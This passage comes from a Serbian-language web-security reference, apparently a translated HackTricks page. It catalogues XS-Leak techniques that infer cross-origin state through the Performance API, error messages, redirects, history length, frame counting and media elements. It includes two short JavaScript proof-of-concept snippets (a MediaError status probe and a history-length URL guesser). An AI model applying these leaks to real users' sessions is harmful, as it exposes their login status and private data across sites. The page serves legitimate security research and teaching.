* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Rezime:** Prazni odgovori ne stvaraju unose vremena resursa.
* **Primer Koda**: [https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak](https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak)

Napadač može detektovati da li je zahtev rezultirao praznim telom HTTP odgovora jer **prazne stranice ne stvaraju unos performansi u nekim pregledačima**.

### **Curenje XSS-Auditora**

* **Metode Uključivanja**: Okviri
* **Detektoviva Razlika**: Sadržaj Stranice
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Rezime:** Korišćenjem XSS Auditora u Sigurnosnim Tvrdnjama, napadači mogu detektovati specifične elemente veb stranice posmatrajući promene u odgovorima kada izrađeni payload-ovi pokrenu mehanizam filtriranja auditora.
* **Primer Koda**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)

U Sigurnosnim Tvrdnjama (SA), XSS Auditor, prvobitno namenjen sprečavanju napada Cross-Site Scripting (XSS), paradoksalno može biti iskorišćen za curenje osetljivih informacija. Iako je ova ugrađena funkcija uklonjena iz Google Chrome-a (GC), još uvek je prisutna u SA. 2013. godine, Braun i Heiderich su demonstrirali da XSS Auditor može nenamerno blokirati legitimne skripte, dovodeći do lažnih pozitivnih rezultata. Na osnovu toga, istraživači su razvili tehnike za izvlačenje informacija i detektovanje specifičnog sadržaja na stranicama sa različitim poreklom, koncept poznat kao XS-Curenja, inicijalno prijavljeno od strane Terade i razrađeno od strane Heyesa u blog postu. Iako su ove tehnike bile specifične za XSS Auditor u GC-u, otkriveno je da u SA, stranice blokirane od strane XSS Auditora ne generišu unose u Performance API-ju, otkrivajući metod putem kojeg osetljive informacije i dalje mogu biti curenje.

### Curenje X-Frame

* **Metode Uključivanja**: Okviri
* **Detektoviva Razlika**: Zaglavlje
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2), [https://xsleaks.github.io/xsleaks/examples/x-frame/index.html](https://xsleaks.github.io/xsleaks/examples/x-frame/index.html), [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options)
* **Rezime:** Resurs sa zaglavljem X-Frame-Options ne stvara unos vremena resursa.
* **Primer Koda**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)

Ako stranica **nije dozvoljena** da se **prikazuje** u **iframe-u**, neće kreirati unos performansi. Kao rezultat, napadač može detektovati zaglavlje odgovora **`X-Frame-Options`**.\
Isto se dešava ako koristite **tag za ugradnju**. 

### Detekcija Preuzimanja

* **Metode Uključivanja**: Okviri
* **Detektoviva Razlika**: Zaglavlje
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Rezime:** Preuzimanja ne stvaraju unose vremena resursa u Performance API-ju.
* **Primer Koda**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)

Slično kao kod XS-Curenja opisanog, **resurs koji se preuzima** zbog zaglavlja ContentDisposition, takođe ne stvara unos performansi. Ova tehnika funkcioniše u svim glavnim pregledačima.
### Početak curenja preusmeravanja

* **Metode uključivanja**: Okviri
* **Detektovana razlika**: Preusmeravanje
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Sažetak**: Unos vremena resursa otkriva početno vreme preusmeravanja.
* **Primer koda**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)

Otkrili smo jedan primer XS-Leak instance koji zloupotrebljava ponašanje nekih pregledača koji beleže previše informacija za zahteve sa različitih izvora. Standard definiše podskup atributa koji bi trebalo postaviti na nulu za resurse sa različitih izvora. Međutim, u **SA** je moguće otkriti da li je korisnik **preusmeren** od strane ciljne stranice, upitivanjem **Performance API**-ja i proverom podataka o vremenu **redirectStart**.

### Curenje trajanja preusmeravanja

* **Metode uključivanja**: Fetch API
* **Detektovana razlika**: Preusmeravanje
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Sažetak**: Trajanje unosa vremena je negativno kada dođe do preusmeravanja.
* **Primer koda**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)

U GC-u, **trajanje** za zahteve koji rezultiraju **preusmeravanjem** je **negativno** i može se stoga **razlikovati** od zahteva koji ne rezultiraju preusmeravanjem.

### CORP curenje

* **Metode uključivanja**: Okviri
* **Detektovana razlika**: Zaglavlje
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **Sažetak**: Resursi zaštićeni sa CORP-om ne stvaraju unose vremena resursa.
* **Primer koda**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)

U nekim slučajevima, **nextHopProtocol unos** može se koristiti kao tehnika curenja. U GC-u, kada je postavljeno **CORP zaglavlje**, nextHopProtocol će biti **prazan**. Imajte na umu da SA neće kreirati unos performansi uopšte za resurse omogućene za CORP.

### Servisni radnik

* **Metode uključivanja**: Okviri
* **Detektovana razlika**: Korišćenje API-ja
* **Više informacija**: [https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/](https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/)
* **Sažetak**: Otkrijte da li je servisni radnik registrovan za određeni izvor.
* **Primer koda**:

Servisni radnici su skriptni konteksti vođeni događajima koji se izvršavaju na izvoru. Oni se izvršavaju u pozadini web stranice i mogu presresti, izmeniti i **keširati resurse** kako bi kreirali offline web aplikaciju.\
Ako je **resurs keširan** od strane **servisnog radnika** pristupljen putem **iframe-a**, resurs će biti **učitan iz keša servisnog radnika**.\
Za otkrivanje da li je resurs **učitan iz keša servisnog radnika** može se koristiti **Performance API**.\
Ovo takođe može biti urađeno sa napadom na vreme (proverite rad za više informacija).

### Keš

* **Metode uključivanja**: Fetch API
* **Detektovana razlika**: Vreme
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
* **Sažetak**: Moguće je proveriti da li je resurs smešten u keš.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](https://xsinator.com/testing.html#Cache%20Leak%20\(POST\))

Korišćenjem [Performance API](xs-search.md#performance-api) moguće je proveriti da li je resurs keširan.

### Trajanje mreže

* **Metode uključivanja**: Fetch API
* **Detektovana razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
* **Sažetak**: Moguće je dobiti trajanje mreže zahteva iz `performance` API-ja.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)

## Tehnika poruka o greškama

### Greška medija

* **Metode uključivanja**: HTML elementi (Video, Audio)
* **Detektovana razlika**: Kod statusa
* **Više informacija**: [https://bugs.chromium.org/p/chromium/issues/detail?id=828265](https://bugs.chromium.org/p/chromium/issues/detail?id=828265)
* **Sažetak**: U Firefox-u je moguće tačno procuriti statusni kod zahteva sa različitih izvora.
* **Primer koda**: [https://jsbin.com/nejatopusi/1/edit?html,css,js,output](https://jsbin.com/nejatopusi/1/edit?html,css,js,output)
```javascript
// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
document.getElementById("log").innerHTML += msg;
}

function startup() {
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";

// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("<strong>Status: " + status + "</strong> (Error code:" + err.code + " / Error Message: " + err.message + ")<br>");
};
audioElement.onerror = errHandler;
}
```
### CORS Greška

* **Metode Uključivanja**: Fetch API
* **Detektibilna Razlika**: Header
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
* **Sažetak:** U sigurnosnim tvrdnjama (SA), CORS greške nenamerno otkrivaju puni URL preusmerenih zahteva.
* **Primer koda**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)

Ova tehnika omogućava napadaču da **izvuče odredište preusmerenja sajta sa različitog porekla** iskorišćavanjem načina na koji Webkit bazirani pregledači obrađuju CORS zahteve. Konkretno, kada se **CORS omogućeni zahtev** pošalje ka ciljnom sajtu koji izdaje preusmerenje na osnovu korisničkog stanja i pregledač naknadno odbije zahtev, **puni URL cilja preusmerenja** se otkriva unutar poruke o grešci. Ova ranjivost ne samo da otkriva činjenicu preusmerenja već takođe otkriva krajnju tačku preusmerenja i sve **osetljive upite** koje može sadržati.

### SRI Greška

* **Metode Uključivanja**: Fetch API
* **Detektibilna Razlika**: Header
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
* **Sažetak:** U sigurnosnim tvrdnjama (SA), SRI greške nenamerno otkrivaju puni URL preusmerenih zahteva.
* **Primer koda**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)

Napadač može iskoristiti **opsežne poruke o greškama** da zaključi veličinu odgovora sa različitog porekla. Ovo je moguće zbog mehanizma Integriteta Podresursa (SRI), koji koristi atribut integriteta da validira da resursi preuzeti, često sa CDN-ova, nisu izmenjeni. Da bi SRI radio na resursima sa različitog porekla, oni moraju biti **omogućeni za CORS**; inače, nisu podložni proverama integriteta. U sigurnosnim tvrdnjama (SA), slično kao i kod CORS greške XS-Leak, poruka o grešci može biti uhvaćena nakon što fetch zahtev sa atributom integriteta ne uspe. Napadači mogu namerno **izazvati ovu grešku** dodeljivanjem **lažne vrednosti heša** atributu integriteta bilo kog zahteva. U SA, rezultirajuća poruka o grešci nenamerno otkriva dužinu sadržaja traženog resursa. Ovo curenje informacija omogućava napadaču da razlikuje varijacije u veličini odgovora, otvarajući put za sofisticirane XS-Leak napade.

### CSP Kršenje/Otkrivanje

* **Metode Uključivanja**: Iskačući prozori
* **Detektibilna Razlika**: Statusni Kod
* **Više informacija**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
* **Sažetak:** Dozvoljavanje samo sajta žrtve u CSP-u, ako pokušamo da pristupimo i preusmerimo ga na drugi domen, CSP će izazvati detektibilnu grešku.
* **Primer koda**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)

XS-Leak može koristiti CSP da detektuje da li je sajt sa različitog porekla preusmeren na drugo poreklo. Ovo curenje može detektovati preusmerenje, ali dodatno, domen cilja preusmerenja curenje. Osnovna ideja ovog napada je **dozvoliti ciljni domen na sajtu napadača**. Kada se izda zahtev ka ciljnom domenu, on se **preusmerava** na sajt sa različitog porekla. **CSP blokira** pristup tome i kreira **izveštaj o kršenju korišćen kao tehniku curenja**. Zavisno od pregledača, **ovaj izveštaj može otkriti lokaciju cilja preusmerenja**.\
Moderni pregledači neće pokazati URL na koji je preusmeren, ali možete i dalje detektovati da je preusmerenje sa različitog porekla pokrenuto.

### Keš

* **Metode Uključivanja**: Frejmovi, Iskačući prozori
* **Detektibilna Razlika**: Sadržaj Stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
* **Sažetak:** Obrišite fajl iz keša. Otvorite ciljnu stranicu, proverite da li je fajl prisutan u kešu.
* **Primer koda:**

Pregledači mogu koristiti jedan zajednički keš za sve sajtove. Bez obzira na njihovo poreklo, moguće je zaključiti da li je ciljna stranica **zahtevala određeni fajl**.

Ako stranica učitava sliku samo ako je korisnik prijavljen, možete **povući** **resurs** (tako da više nije keširan ako jeste, pogledajte više informacija), **izvršiti zahtev** koji bi mogao učitati taj resurs i pokušati učitati resurs **sa lošim zahtevom** (npr. koristeći predug referer zaglavlje). Ako učitavanje resursa **nije izazvalo grešku**, to je zato što je bio **keširan**.

### CSP Direktiva

* **Metode Uključivanja**: Frejmovi
* **Detektibilna Razlika**: Header
* **Više informacija**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
* **Sažetak:** CSP direktive zaglavlja mogu se ispitati korišćenjem CSP atributa frejma, otkrivajući detalje politike.
* **Primer koda**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)

Nova funkcija u Google Chrome-u (GC) omogućava web stranicama da **predlože Content Security Policy (CSP)** postavljanjem atributa na elementu frejma, sa direktivama politike prenesenim zajedno sa HTTP zahtevom. Obično, ugrađeni sadržaj mora **autorizovati ovo putem HTTP zaglavlja**, ili će se prikazati **stranica greške**. Međutim, ako je frejm već pod kontrolom CSP-a i nova predložena politika nije restriktivnija, stranica će se normalno učitati. Ovaj mehanizam otvara put napadaču da **detektuje specifične CSP direktive** stranice sa različitog porekla identifikujući stranicu greške. Iako je ova ranjivost označena kao ispravljena, naša istraživanja otkrivaju **novu tehniku curenja** sposobnu da detektuje stranicu greške, sugerišući da osnovni problem nikada nije u potpunosti rešen.

### **CORP**

* **Metode Uključivanja**: Fetch API
* **Detektibilna Razlika**: Header
* **Više informacija**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
* **Sažetak:** Resursi obezbeđeni Cross-Origin Resource Policy (CORP) će izbaciti grešku kada se preuzmu sa zabranjenog porekla.
* **Primer koda**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)

CORP zaglavlje je relativno nova bezbednosna funkcija web platforme koja kada je postavljena **blokira no-cors cross-origin zahteve ka datom resursu**. Prisustvo zaglavlja može biti detektovano, jer će resurs zaštićen sa CORP **izbaciti grešku kada se preuzme**.
### CORB

* **Metode uključivanja**: HTML elementi
* **Detektovana razlika**: Zaglavlja
* **Više informacija**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
* **Sažetak**: CORB može omogućiti napadačima da otkriju kada je prisutno zaglavlje **`nosniff`** u zahtevu.
* **Primer koda**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)

Proverite link za više informacija o napadu.

### CORS greška na konfiguraciji odraza porekla <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>

* **Metode uključivanja**: Fetch API
* **Detektovana razlika**: Zaglavlja
* **Više informacija**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
* **Sažetak**: Ako se zaglavlje Origin odražava u zaglavlju `Access-Control-Allow-Origin`, moguće je proveriti da li je resurs već u kešu.
* **Primer koda**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)

U slučaju kada se **zaglavlje Origin** odražava u zaglavlju `Access-Control-Allow-Origin`, napadač može iskoristiti ovu situaciju kako bi pokušao **dobiti** resurs u **CORS** režimu. Ako **greška nije izazvana**, to znači da je resurs **ispravno preuzet sa veba**, a ako se **greška pojavi**, to znači da je **pristupljen iz keša** (greška se pojavljuje jer keš čuva odgovor sa CORS zaglavljem koje dozvoljava originalni domen, a ne domen napadača).\
Imajte na umu da ako se poreklo ne odražava već se koristi zamenski znak (`Access-Control-Allow-Origin: *`), ovo neće funkcionisati.

## Tehnika čitljivih atributa

### Preusmeravanje Fetch

* **Metode uključivanja**: Fetch API
* **Detektovana razlika**: Statusni kod
* **Više informacija**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
* **Sažetak:** GC i SA omogućavaju proveru tipa odgovora (opaqueredirect) nakon završetka preusmeravanja.
* **Primer koda**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)

Slanjem zahteva pomoću Fetch API sa `redirect: "manual"` i drugim parametrima, moguće je pročitati atribut `response.type` i ako je jednak `opaqueredirect`, onda je odgovor bio preusmeravanje.

### COOP

* **Metode uključivanja**: Iskačući prozori
* **Detektovana razlika**: Zaglavlje
* **Više informacija**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
* **Sažetak:** Stranice zaštićene Cross-Origin Opener Policy (COOP) sprečavaju pristup preko-graničnim interakcijama.
* **Primer koda**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)

Napadač je sposoban da zaključi prisustvo zaglavlja Cross-Origin Opener Policy (COOP) u HTTP odgovoru preko granice. COOP se koristi od strane veb aplikacija kako bi sprečio spoljne sajtove da dobiju proizvoljne reference prozora. Vidljivost ovog zaglavlja može se uočiti pokušajem pristupa **referenci contentWindow**. U situacijama gde se COOP primenjuje uslovno, **svojstvo opener** postaje pokazatelj: ono je **nedefinisano** kada je COOP aktivan, a **definisano** kada je odsutan.

### Maksimalna dužina URL-a - Server strana

* **Metode uključivanja**: Fetch API, HTML elementi
* **Detektovana razlika**: Statusni kod / Sadržaj
* **Više informacija**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
* **Sažetak:** Otkrijte razlike u odgovorima zbog dužine odgovora preusmeravanja koja može biti prevelika da server odgovori sa greškom i generiše upozorenje.
* **Primer koda**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)

Ako server-side preusmeravanje koristi **korisnički unos unutar preusmeravanja** i **dodatne podatke**, moguće je otkriti ovu situaciju jer su obično **serveri ograničeni dužinom zahteva**. Ako je **korisnički podatak** dužine - 1, jer se **preusmeravanje koristi tim podacima** i **dodaje** nešto **dodatno**, to će izazvati **grešku koja se može detektovati putem događaja greške**.

Ako na neki način možete postaviti kolačiće korisniku, možete takođe izvesti ovaj napad tako što ćete **postaviti dovoljno kolačića** ([**cookie bomba**](hacking-with-cookies/cookie-bomb.md)) tako da sa **povećanom veličinom odgovora** ispravni odgovor izaziva **grešku**. U ovom slučaju, zapamtite da ako pokrenete ovaj zahtev sa istog sajta, `<script>` će automatski poslati kolačiće (tako da možete proveriti greške).\
Primer **cookie bombe + XS-Search** može se pronaći u planiranom rešenju ovog teksta: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)

`SameSite=None` ili biti u istom kontekstu obično je potrebno za ovu vrstu napada.

### Maksimalna dužina URL-a - Klijentska strana

* **Metode uključivanja**: Iskačući prozori
* **Detektovana razlika**: Statusni kod / Sadržaj
* **Više informacija**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
* **Sažetak:** Otkrijte razlike u odgovorima zbog dužine odgovora preusmeravanja koja može biti prevelika za zahtev da bi se primetila razlika.
* **Primer koda**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)

Prema [Chromium dokumentaciji](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url\_display\_guidelines/url\_display\_guidelines.md#URL-Length), maksimalna dužina URL-a u Chrome-u je 2MB.

> Uopšteno, _web platforma_ nema ograničenja dužine URL-ova (iako je 2^31 često ograničenje). _Chrome_ ograničava URL-ove na maksimalnu dužinu od **2MB** iz praktičnih razloga i kako bi izbegao probleme sa odbijanjem usluge u komunikaciji između procesa.

Stoga, ako je **URL preusmeravanja veći u jednom od slučajeva**, moguće je napraviti preusmeravanje sa **URL-om većim od 2MB** da bi se pogodilo **ograničenje dužine**. Kada se to desi, Chrome prikazuje stranicu **`about:blank#blocked`**.

**Zapažena razlika** je da ako je **preusmeravanje** bilo **završeno**, `window.origin` baca **grešku** jer preko granice ne može pristupiti tim informacijama. Međutim, ako je **ograničenje** bilo **dostignuto** i učitana stranica je bila **`about:blank#blocked`**, `origin` prozora ostaje onaj od **roditelja**, što je **pristupačna informacija**.

Svi dodatni podaci potrebni za dostizanje **2MB** mogu se dodati putem **heša** u početnom URL-u kako bi se koristili u preusmeravanju.

{% content-ref url="xs-search/url-max-length-client-side.md" %}
[url-max-length-client-side.md](xs-search/url-max-length-client-side.md)
{% endcontent-ref %}
### Maksimalni Redirecti

* **Metode uključivanja**: Fetch API, Frejmovi
* **Detektovana razlika**: Statusni kod
* **Više informacija**: [https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3\_0\_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3\_0\_76)
* **Rezime:** Koristite ograničenje preusmeravanja pregledača da biste utvrdili pojavu preusmeravanja URL-a.
* **Primer koda**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)

Ako je **maksimalni** broj **redirecta** koje pregledač može pratiti **20**, napadač može pokušati da učita svoju stranicu sa **19 redirecta** i na kraju **pošalje žrtvu** na testiranu stranicu. Ako se desi **greška**, to znači da je stranica pokušavala da **preusmeri žrtvu**.

### Dužina Istorije

* **Metode uključivanja**: Frejmovi, Iskačući prozori
* **Detektovana razlika**: Redirecti
* **Više informacija**: [https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
* **Rezime:** JavaScript kod manipuliše istorijom pregledača i može se pristupiti preko svojstva dužine.
* **Primer koda**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)

**History API** omogućava JavaScript kodu da manipuliše istorijom pregledača, koja **čuva stranice koje je posetio korisnik**. Napadač može koristiti svojstvo dužine kao metodu uključivanja: da detektuje JavaScript i HTML navigaciju.\
Provera `history.length`, nateranje korisnika da **navigira** do stranice, **vrati** je na isti izvor i **provera** nove vrednosti **`history.length`**.

### Dužina Istorije sa istim URL-om

* **Metode uključivanja**: Frejmovi, Iskačući prozori
* **Detektovana razlika**: Ako je URL isti kao pretpostavljeni
* **Rezime:** Moguće je pretpostaviti da li je lokacija frejma/iskačućeg prozora na određenom URL-u zloupotrebom dužine istorije.
* **Primer koda**: Ispod

Napadač bi mogao koristiti JavaScript kod da **manipuliše lokacijom frejma/iskačućeg prozora na pretpostavljeni URL** i **odmah** je **promeniti u `about:blank`**. Ako se dužina istorije povećala, to znači da je URL bio tačan i imao je vremena da se **poveća jer se URL ne učitava ponovo ako je isti**. Ako se nije povećala, to znači da je **pokušao da učita pretpostavljeni URL** ali pošto smo **odmah nakon toga** učitali **`about:blank`**, dužina istorije se **nikada nije povećala** prilikom učitavanja pretpostavljenog URL-a.
```javascript
async function debug(win, url) {
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
}

win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));

win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));
```
### Brojanje okvira

* **Metode uključivanja**: Okviri, Iskačući prozori
* **Detektoviva razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
* **Sažetak:** Procenite količinu elemenata iframe inspekcijom svojstva `window.length`.
* **Primer koda**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)

Brojanje **broja okvira na vebu** otvorenih putem `iframe` ili `window.open` može pomoći u identifikaciji **statusa korisnika na toj stranici**.\
Osim toga, ako stranica uvek ima isti broj okvira, provera **kontinuirano** broja okvira može pomoći u identifikaciji **uzorka** koji može otkriti informacije.

Primer ove tehnike je da se u Chrome-u **PDF** može **detektovati** pomoću **brojanja okvira** jer se interna upotrebljava `embed`. Postoje [Parametri otvorenog URL-a](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) koji omogućavaju određenu kontrolu nad sadržajem kao što su `zoom`, `view`, `page`, `toolbar`, gde bi ova tehnika mogla biti interesantna.

### HTMLElementi

* **Metode uključivanja**: HTML elementi
* **Detektoviva razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/)
* **Sažetak:** Pročitajte procurenu vrednost da biste razlikovali između 2 moguća stanja
* **Primer koda**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak](https://xsinator.com/testing.html#Media%20Dimensions%20Leak), [https://xsinator.com/testing.html#Media%20Duration%20Leak](https://xsinator.com/testing.html#Media%20Duration%20Leak)

Procurenje informacija putem HTML elemenata predstavlja zabrinutost u vezi sa bezbednošću veba, posebno kada se dinamički generišu medijski fajlovi na osnovu korisničkih informacija, ili kada se dodaju vodeni žigovi, menjajući veličinu medija. To može biti iskorišćeno od strane napadača da razlikuje moguća stanja analizirajući informacije izložene određenim HTML elementima.

### Informacije izložene HTML elementima

* **HTMLMediaElement**: Ovaj element otkriva `duration` i `buffered` vreme medija, koje se mogu pristupiti putem njegovog API-ja. [Pročitajte više o HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
* **HTMLVideoElement**: Otkriva `videoHeight` i `videoWidth`. U nekim pregledačima, dodatna svojstva poput `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, i `webkitDecodedFrameCount` su dostupna, pružajući detaljnije informacije o sadržaju medija. [Pročitajte više o HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
* **getVideoPlaybackQuality()**: Ova funkcija pruža detalje o kvalitetu reprodukcije videa, uključujući `totalVideoFrames`, što može ukazivati na količinu obrađenih video podataka. [Pročitajte više o getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
* **HTMLImageElement**: Ovaj element otkriva `height` i `width` slike. Međutim, ako je slika nevažeća, ova svojstva će vratiti 0, a funkcija `image.decode()` će biti odbijena, ukazujući na neuspeh učitavanja slike na pravilan način. [Pročitajte više o HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)

### CSS Svojstvo

* **Metode uključivanja**: HTML elementi
* **Detektoviva razlika**: Sadržaj stranice
* **Više informacija**: [https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle](https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle), [https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html](https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html)
